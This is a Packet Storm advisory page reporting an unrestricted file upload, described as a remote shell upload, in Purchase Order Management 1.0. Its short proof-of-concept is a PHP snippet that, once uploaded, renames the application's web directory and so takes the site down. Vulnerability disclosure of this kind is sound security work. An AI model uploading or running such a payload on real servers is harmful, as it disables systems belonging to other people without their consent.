Purchase Order Management 1.0 Shell Upload ≈ Packet Storm

Purchase Order Management 1.0 Shell Upload ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

Purchase Order Management 1.0 Shell Upload[6]
Authored by nu11secur1ty[7]

Purchase Order Management version 1.0 suffers a remote shell upload vulnerability. Flow details to achieve this are shown in the video link provided.

SHA-256 | ebd87a2284147cd2df2e918dac7d56fd2fe8ef6e6817d1b763329b3720bb9d2a

Change Mirror[11] Download[12]

        ## Title: Purchase Order Management-1.0 - File Inclusion Vulnerabilities - Unprivileged user interaction - file upload in the server
## Author: nu11secur1ty
## Date: 03.06.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/
## Description:
The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities.
The users of this system are allowed to submit input into files or
upload files to the server.
The malicious attacker can get absolute control of this system!
STATUS: CRITICAL Vulnerability
[+]Get Info:
// by nu11secur1ty - 2023
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/purchase_order/" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
## Reproduce:
## Proof and Exploit:
## Time spend:

Login[13] or Register[14] to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives


packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.


"No secure path in the world"